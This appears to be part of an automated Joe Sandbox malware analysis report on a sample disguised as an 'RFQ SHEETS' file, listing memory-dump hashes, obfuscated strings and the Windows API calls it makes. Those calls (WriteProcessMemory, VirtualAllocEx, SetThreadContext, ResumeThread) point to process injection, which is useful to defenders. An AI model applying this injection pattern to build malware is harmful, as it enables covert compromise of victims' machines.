                                                                                                                                                                                                • Opcode Fuzzy Hash: 53101c47d6ccfb755201e855988f8d5df786f60dd3c129e0a9500de289e00048
                                                                                                                                                                                                • Instruction Fuzzy Hash: E0C14170E00228CFEB24DF69C894BADB7B2FF84314F1484A9D109AB295DB759D86CF51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 3ba8179204ff5348e7e0bb4122ab6b0ad46f868002dd7d377e3b65858482c024
                                                                                                                                                                                                • Instruction ID: a4178834558c7461032b60db454c66892f3766f79924e97e89e12fac4f48eb95
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ba8179204ff5348e7e0bb4122ab6b0ad46f868002dd7d377e3b65858482c024
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BB14070E00228CFEB24DF69C894BADB7B2FF84300F1484A9D109AB295DB759D82CF51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a2748bd7cd74dcfa24e48d323c828e91c54bb41f740c6e2ba5f97d7f2eb3441a
                                                                                                                                                                                                • Instruction ID: a10813dbfeadf1de05b2ff8dca4012d0550e39438d09d50494d93842ea28ffe2
                                                                                                                                                                                                • Opcode Fuzzy Hash: a2748bd7cd74dcfa24e48d323c828e91c54bb41f740c6e2ba5f97d7f2eb3441a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 10B11274E05219DBCF08CFE9D9846EDFBB3FB89301F20952AD41AAB258D7349941CB24
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 21694efc05d3e03f7ecebf0af8ec99f676890a584845b4469423aa04630715ba
                                                                                                                                                                                                • Instruction ID: bb0a8ed52ac7efadd928fbb3c8fae7e600ffc2f02c4dbec80e8268e062ea030e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 21694efc05d3e03f7ecebf0af8ec99f676890a584845b4469423aa04630715ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 77614974D01219DFDB04CFE9D984AAEBBB2FF48302F18952AD422AB350D7759A42CF51
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 4cd2a5afd33b9087eb5535ab0e1eb9e5ce46fe00f54439e8dc535d13e7839dbb
                                                                                                                                                                                                • Instruction ID: 301d5265ec00c7e434c9b3a1046094a25e434beb29e9cf571461db0f93bf4c93
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cd2a5afd33b9087eb5535ab0e1eb9e5ce46fe00f54439e8dc535d13e7839dbb
                                                                                                                                                                                                • Instruction Fuzzy Hash: C1616874D01219DFDB08CFE9D944AAEBBB2FF48306F18952AD422AB250D7758A42CF50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 577e60eef73c159232b5da41c780d83c1ff7b033b40c84352f9df4a980f75a35
                                                                                                                                                                                                • Instruction ID: 5aa81fe189f1c7697ab36c9473210b0e0352cbeb1b57ad9eb565db17649a6957
                                                                                                                                                                                                • Opcode Fuzzy Hash: 577e60eef73c159232b5da41c780d83c1ff7b033b40c84352f9df4a980f75a35
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9511574D01218CFDB18CFA6C884ADEBBF2FF88311F1085AAD509AB254DB756A85CF50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 816e83eaf420ed83a11bdf3cf5ab182e49d9f283258a4635348db85fa5dac8e4
                                                                                                                                                                                                • Instruction ID: 559480e2736bf3c300df0a5b5d5b2f3233e580071399eb8e2d94279b3e6ece5e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 816e83eaf420ed83a11bdf3cf5ab182e49d9f283258a4635348db85fa5dac8e4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54413974D01658CFDB18CFA6C8946DEBBF2BF88300F14C5AAD409AB258DB746A85CF50
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e44d517eaa3451cf930918bb3eacc4aa5736b46430a4b3c2ace5403fb506e41f
                                                                                                                                                                                                • Instruction ID: 96d5b555352630bd3441c60e17922b644f9f45134a76ec5ce141cceb0af4d27c
                                                                                                                                                                                                • Opcode Fuzzy Hash: e44d517eaa3451cf930918bb3eacc4aa5736b46430a4b3c2ace5403fb506e41f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6531E975E006198BEB58CF6BD85479EBBB3BFC8200F04C5AAD50CA7254DB305A858F25
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2bcdb70d058fe28b68b68c789e3eb7e548f5d20c200c14bda4969ff8e44a9c8e
                                                                                                                                                                                                • Instruction ID: 4102f3bbc28272d64ab6c913c7dc7f1cc8715d01b368f5e9c5e11635461237d5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcdb70d058fe28b68b68c789e3eb7e548f5d20c200c14bda4969ff8e44a9c8e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321FF71E016189BEB58CFABDC4069EFBF7BFC8200F04C1BAD518A6264EB3419558F55
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                                • API String ID: 0-2735749406
                                                                                                                                                                                                • Opcode ID: afb4174180988ba960ec0cad7c24d78be9027e2c39beb1f6c3c06ad237ecae6d
                                                                                                                                                                                                • Instruction ID: 2f631d2c214c8743920ba01045ea6e65021448df73442b33959f3143d4054ddf
                                                                                                                                                                                                • Opcode Fuzzy Hash: afb4174180988ba960ec0cad7c24d78be9027e2c39beb1f6c3c06ad237ecae6d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C327E30A006248FCB25CF69C884A9EFBF2FF49314F148559E9199B3A2D731ED42CB91

                                                                                                                                                                                                Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: LR^q$LR^q$PH^q$PH^q$$^q$$^q$$^q$$^q
• API String ID: 0-3757092236
• Opcode ID: 826ecd3a5ac232bb9d18589094e2f4a8baf96b35549115a0dd1d8ade2f93c6fe
• Instruction ID: 75608b717beec7d94f9e5af05d49de0416f8b20fbfb3f25a7d4ab0de5b1fda30
• Opcode Fuzzy Hash: 826ecd3a5ac232bb9d18589094e2f4a8baf96b35549115a0dd1d8ade2f93c6fe
• Instruction Fuzzy Hash: D8B15C70A04129DFCB25CFA9C580AADFBF2FF88300F248555E846AB351D774AD82CB91

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q$$^q$$^q$$^q
• API String ID: 0-4240619703
• Opcode ID: d7f6caaad8765ef2a06d21a088239528b623d7d0e73d9cfcbe58ed794b911296
• Instruction ID: 963aae2d60a8bb0a34c8e262371fcb368d85e14e5d22f3729af62455eb0c9096
• Opcode Fuzzy Hash: d7f6caaad8765ef2a06d21a088239528b623d7d0e73d9cfcbe58ed794b911296
• Instruction Fuzzy Hash: 63819074F04268DBEB249BA8D85876EB6E2FB84700F11846AE557DB384DE78CC42C752

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q$$^q$$^q
• API String ID: 0-3122343355
• Opcode ID: 324c9cb7b94c8026e626caf1645da33fe8844a9e802e2171c955c0b303abe244
• Instruction ID: bb7543cf7d7d68fa8395a02e665dc2d63c39914a49c21799b2406622bb0afe59
• Opcode Fuzzy Hash: 324c9cb7b94c8026e626caf1645da33fe8844a9e802e2171c955c0b303abe244
• Instruction Fuzzy Hash: 58911470F042A4DFE7259FB8D85876EBBE2FB85700F05846AE447DB285DA788C42C752

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: $^q$$^q
• API String ID: 0-355816377
• Opcode ID: bcb998292184cf7b17eb3d0b05198e556e9ff08e87df61d83c5094fd9d4738da
• Instruction ID: 5a1b343cbe2facfb153fb1de941c9986e481a7dd90c034552ab3dcaaa7607871
• Opcode Fuzzy Hash: bcb998292184cf7b17eb3d0b05198e556e9ff08e87df61d83c5094fd9d4738da
• Instruction Fuzzy Hash: 9D621574A042198FEB25DBA8C864B9EBBB2FF94301F1080ADC10A6B7A4DF355D85DF51
Strings
Memory Dump Source
• Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: Hbq$Hbq
• API String ID: 0-4258043069
• Opcode ID: 8512c3d782f058a141cbc564589bfe0dc280e1d94ffe4cdd934f6d8140ea7133
• Instruction ID: 8be3e9986bdaa44951e2b1f46054e34a581366808359ff19b08d85a0dcce8667
• Opcode Fuzzy Hash: 8512c3d782f058a141cbc564589bfe0dc280e1d94ffe4cdd934f6d8140ea7133
• Instruction Fuzzy Hash: 16D191307002259FDB159F68D858B6EBBA2FB88711F14856EFA06CB395CF749C82C791
Strings
Memory Dump Source
• Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: 4'^q$4'^q
• API String ID: 0-2697143702
• Opcode ID: d899ab4c8436558078dae3d9758c92d9959fbb65098670934b7c1b9e3a9615ae
• Instruction ID: cd527d1fbfcdcacb04e493cfe6836e5f59cb3ca5f066d7f1530759a448d6dd06
• Opcode Fuzzy Hash: d899ab4c8436558078dae3d9758c92d9959fbb65098670934b7c1b9e3a9615ae
• Instruction Fuzzy Hash: EDB14F703005018FEB559B2DC965BBDB7D7AF85A46F15446AE902CF3B2EA29CC828741
Strings
Memory Dump Source
• Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID:
• String ID: PH^q$PH^q
• API String ID: 0-1598597984
• Opcode ID: 26f52e01d3ffd86773cdfa4c54fab72d9584e187ae5f8ab7480bb48875af43fb
• Instruction ID: f846eac01cb31f6c3315ca957e1194b26df3bcb4fb7e42d8a4e35bed33863a7f
• Opcode Fuzzy Hash: 26f52e01d3ffd86773cdfa4c54fab72d9584e187ae5f8ab7480bb48875af43fb
• Instruction Fuzzy Hash: D9C12774A00218CFCB94DF68C994AAD7BF6BF88315F1545A8E516EB3A1DB31EC81CB50
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,bq$,bq
                                                                                                                                                                                                • API String ID: 0-2699258169
                                                                                                                                                                                                • Opcode ID: e57246527ba04feb0085944b8f84472916f2cb1ffcbc60338e817794dd985ef9
                                                                                                                                                                                                • Instruction ID: 12de5b5eb8715344fc163443539e6fcef169c0cf2df2d2a95be2e139d480b5df
                                                                                                                                                                                                • Opcode Fuzzy Hash: e57246527ba04feb0085944b8f84472916f2cb1ffcbc60338e817794dd985ef9
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA819134A041258FDB1CCF6DCA94A6AFBF2BF9A310B2581A9E505D7361D731E842CB91
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Hbq$PH^q
                                                                                                                                                                                                • API String ID: 0-1164131142
                                                                                                                                                                                                • Opcode ID: 7ba7ea1c984321e318c7fcdd8c327c14d5f4bd5bc56d861b976c2a35f89d915b
                                                                                                                                                                                                • Instruction ID: 681720768fb751ff8dd7df474f74fec2b65ea8d18100c030d9307ec0c672cb54
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ba7ea1c984321e318c7fcdd8c327c14d5f4bd5bc56d861b976c2a35f89d915b
                                                                                                                                                                                                • Instruction Fuzzy Hash: A2814870A102149FCB54DF28C994A6DBBF6FF88311B1186A9E956DF3A1DB30EC41CB50
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: (o^q
                                                                                                                                                                                                • API String ID: 0-74704288
                                                                                                                                                                                                • Opcode ID: 1fe6517ca59ec33d452a160b10d4d899f89cd3091455f54bebf58e7ceeef3af6
                                                                                                                                                                                                • Instruction ID: c46f593682aeb7247037a1aa7381fa381a17fe526993b2b2c3b9b1903de70b17
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fe6517ca59ec33d452a160b10d4d899f89cd3091455f54bebf58e7ceeef3af6
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF024B70601125DFCB15CF68C984A6AFBF6FF88350F158598E4059B2A6C732ED82CB62
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: 4'^q
                                                                                                                                                                                                • API String ID: 0-1614139903
                                                                                                                                                                                                • Opcode ID: d3e8f0a807e5122aef157f4f29469331d3e61ae8b51b0cc1b10d9d7cefee4c46
                                                                                                                                                                                                • Instruction ID: de23c7b780721828b162cadcf447ccd953270062745131cc7255f30503fc82d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: d3e8f0a807e5122aef157f4f29469331d3e61ae8b51b0cc1b10d9d7cefee4c46
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94E15570D09218CFCB14DFA9D8487ADBBB1FF4A301F0594AAD089A7252DB744E99CF52
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • DeleteFileW.KERNELBASE(00000000), ref: 06821760
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DeleteFile
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                                                                                • Opcode ID: 65f58058239bfac81439dd1fcaec820641cbe5b93a7528992194f01f43f93c25
                                                                                                                                                                                                • Instruction ID: 58dee1ffa8b647730e2ec5af2cb9065e136cef64cc84d5ae8b8468a0db9bfde6
                                                                                                                                                                                                • Opcode Fuzzy Hash: 65f58058239bfac81439dd1fcaec820641cbe5b93a7528992194f01f43f93c25
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5031E6B0C093959FCB12CF69C8546DEBFB0EF46210F16819BC594E7292C3385949CBA1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 080AE088
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                                • Opcode ID: 192fd934e359258bd0a90340bfdc4b0027f4c91b003bcebe2920fb629384435d
                                                                                                                                                                                                • Instruction ID: eb1b4aa5246c4051dfef2bfb0076ea48adec07fb769f850b771ce9d8620f1fa7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 192fd934e359258bd0a90340bfdc4b0027f4c91b003bcebe2920fb629384435d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 792136B19003499FCB10DFAAC885BDEBBF5FF48310F10842AE919A7241C779A955CFA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0682DF9B
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                • Opcode ID: a4f2bb9335543775f70e65a189bae903f23876a6ab1353b17aa64affd81ec23e
                                                                                                                                                                                                • Instruction ID: fd1b1007dfa9a79e8b79ec417a6a6bc705010872a9a15df3423a3d46711233ed
                                                                                                                                                                                                • Opcode Fuzzy Hash: a4f2bb9335543775f70e65a189bae903f23876a6ab1353b17aa64affd81ec23e
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA2148719053899FCB10CFAAC844ADEFFF4AF49320F15845AE859E7292C374A584CFA1
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 080AE7B6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: 5e4364629afaa38cfa9cd3e285b9e6a33ce65b6c6bb6bb96a36de7fbaae34477
                                                                                                                                                                                                • Instruction ID: 4042b0f8c3ea4bf2c26d7d7c132f8a7cc22588d182a0bdcc4129040a9e455f87
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e4364629afaa38cfa9cd3e285b9e6a33ce65b6c6bb6bb96a36de7fbaae34477
                                                                                                                                                                                                • Instruction Fuzzy Hash: F9213A719003098FDB10DFAAC4857EEBBF5EF88324F10842DD419A7241CB789945CFA4
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 080AD64E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                                • Opcode ID: dff79f0afc3d9f1b2a702378a7b225d16a5fbe6e8ac62fce2d047bd6e4ea245e
                                                                                                                                                                                                • Instruction ID: 481a4a7dad67bde2a3df1e77ca11db3db48397ea29e2dce41ba6d69cc1f4cf54
                                                                                                                                                                                                • Opcode Fuzzy Hash: dff79f0afc3d9f1b2a702378a7b225d16a5fbe6e8ac62fce2d047bd6e4ea245e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 352139719003098FDB10DFAAC4857EEBBF5EB48314F108429D519A7240C778A945CBA4
APIs
• VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 080AE50F
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 080A447B
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• DeleteFileW.KERNELBASE(00000000), ref: 06821760
Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 080A447B
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 0682DF9B
Memory Dump Source
• Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 080ADD26
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
Similarity
• API ID: ResumeThread
